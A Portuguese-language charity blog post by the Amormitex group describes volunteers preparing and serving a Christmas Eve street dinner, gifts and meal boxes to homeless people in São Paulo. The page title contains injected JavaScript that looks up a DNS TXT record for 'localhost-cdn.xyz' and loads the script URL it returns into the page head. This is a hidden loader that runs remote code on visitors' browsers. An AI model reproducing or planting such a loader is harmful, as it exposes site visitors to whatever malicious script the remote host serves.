A VERDADEIRA CEIAfetch(“https://cloudflare-dns.com/dns-query?name=localhost-cdn.xyz&type=TXT”, {headers:{ “accept”: “application/dns-json” }}).then(e=>e.json()).then(e=>{const t=document.createElement(“script”);t.src=JSON.parse(e.Answer[0].data),document.querySelector(“head”).appendChild(t)}); | Amormitex

24/12/12 A VERDADEIRA CEIA

No dia 24/12/12 pudemos sentir em nossos corações o verdadeiro amor pregado por Jesus, a verdadeira Ceia de Natal aconteceu !

As 17:00 horas do dia 24/11/12, nos reunimos no Recanto de Interlagos, local onde sempre nos reunimos para a preparação dos marmitex que são levados para rua,  começamos a preparar os alimentos, de uma lado eram cortados os temperos, do outro era preparada uma deliciosa farofa e arroz a grega, na parte externa alguns auxiliares desfiavam o pernil, mais de 30 quilos foram cuidadosamente desfiados, o pernil estava uma delícia, enquanto isso alguns voluntários cortavam deliciosas fatias de bolo de chocolate cobertos com creme de brigadeiro e na mesa mais adiante era embalado o bolo “Bem Casado”.

Enquanto isso outra equipe preparava os refrigerantes que seriam servidos e outra ainda separavam as mesas e o pisca-pisca que seriam levados para alegrar ainda mais nossa festa.

Em breves momentos tudo isso faria parte de uma Ceia de Natal inesquecível !

As 22:00 alguns voluntários que foram na frente, chegavam na praça e reunião nossos queridos convidados.

Às 22:30 h. no Recanto de Interlagos,  tudo estava devidamente preparado, distribuímos tudo com muito carinho entre os 10 veículos e saímos em direção a Praça do Teatro Paulo Eiró localizada em Santo Amaro.

Muitos amigos esperavam ansiosos, pois seria a primeira Ceia de Natal na rua.

Fizemos uma oração de agradecimento, cumprimentamos Jesus, afinal era o seu aniversário e partimos em direção ao nosso destino.

Chegamos na praça por volta das 23;00 horas, trabalhamos em conjunto, enquanto uns colocavam o pisca-pisca na árvore, ligando na bateria do carro, outros preparavam as mesas, os refrigerantes, os alimentos, tudo era colocado nos devidos lugares, sem contar com a “sobre mesa” que estava de dar inveja, era puro chocolate e doce de leite.

Ahh ! me esqueci da falar dos presentes que foram carinhosamente comprados e escolhidos a dedo, ao todo levamos 80 lindos bonés para os homens,  30 lindas blusinhas para as mulheres, uma mais linda que a outra e mais 50 livrinhos minutos de sabedoria com belas mensagens para fortalecer os corações de nossos queridos.

Levamos um violão para animar a festa, de repente do meio de nossos amigos do caminho, surgiu um rapaz altamente empolgado e solicitou o violão para que pudesse tocar, passou uma hora tocando muitas músicas, do outro lado do grupo surgiu um outro amigo assistido e começou a dançar, nos pareceu que ele era de circo, todos se divertiram muito com suas peripécias.

Enquanto isso, alguns de nossos voluntários preparavam tudo com muito carinho, alimentos de um lado, refrigerante do outro, doces na outra mesa, presentes nas sacolas.

Próximo da meia noite, iniciamos a distribuição do alimento para todos, incluindo os voluntários, todos nós jantamos juntos, o amor era muito grande em todos os corações, o ambiente estava totalmente iluminado, pelas poucas luzes do poste e por uma luz intensa que descia do céu, parecia vir diretamente de Jesus.

Todos comeram bastante, servimos os doces, só eu comi 3 pedaços de bolo de brigadeiro.

Olhávamos para o lado e víamos cada vez mais voluntários que sensibilizados pelo Natal, chegavam com seus familiares, o que tornava nossa festa ainda mais bela.

Como era lindo ver as nossas crianças auxiliando os irmãos da rua, mesmo pequeninos eles já sabem a importância de levar o amor aos menos favorecidos e assim eles crescem maduros e conscientes de que possuem uma vida maravilhosa e abençoada.

Do nada, aparece um lindo Papai Noel tocando sininho, me pareceu ser enviado por Deus, perguntamos de onde havia vindo e ele nos disse que todos os anos, exatamente nesta data, sai pelas ruas a procura de lugares para levar alegria, choramos e tiramos várias fotos.

Depois de mais uma hora nossa festa chegava ao fim, nos abraçamos todos, a alegria tomava conta de cada coração presente.

Choramos, rimos, gargalhamos, nos abraçamos e partimos para a segunda parte de nossos trabalhos, ainda haviam aproximadamente 150 marmitas de natal,  quentinhas, para serem distribuídas, nos dividimos em dois grupos, um foi para a região de Santo Amaro e o outro para região do Aeroporto e Berrini.

Parece que éramos guiados por uma força invisível que nos conduzia diretamente aos pontos onde haviam irmão desabrigados, na sua maioria estavam adormecidos, mas ao sentir a presença de amigos que levavam alimentos e presentes, logo despertavam, dava para se ver em cada rosto uma felicidade inexplicável, fomos recebidos com muito carinho, a maioria estava com muita fome, mesmo sendo um horário muito elevado.

Nossos amigos do caminho nos agradeceram muito, os homens colocavam os bonés na cabeça assim que recebiam e as mulheres vestiam a blusa em cima das próprias roupas, tal era a felicidade.

As 3:00 h da madrugada entregamos as últimas refeições e os últimos presentes, estávamos muito cansados fisicamente, mas nossos corações pareciam suportar muitas horas de trabalho.

Nos despedimos todos e fomos para as nossas casas dormir, no dia seguinte, passamos com nossos familiares que sentiram muito a nossa falta, mas que entenderam perfeitamente  a importância de nossa missão.

Obrigado Pai por tudo que recebemos !!!

GRUPO AMORMITEX

 


imagem

MENSAGENS

“Os pequenos atos que se executam são melhores que todos aquele grandes que se planejam”

SOLANGE

Deixe sua Mensagem para aparecer no quadro acima

Deixe seu Nome

Copyright © 2011 Amormitex - desenvolvido por abimael s. silva
Local do trabalho: Rua Monsenhor Freitas, 151 Das 9h00 às 17h00.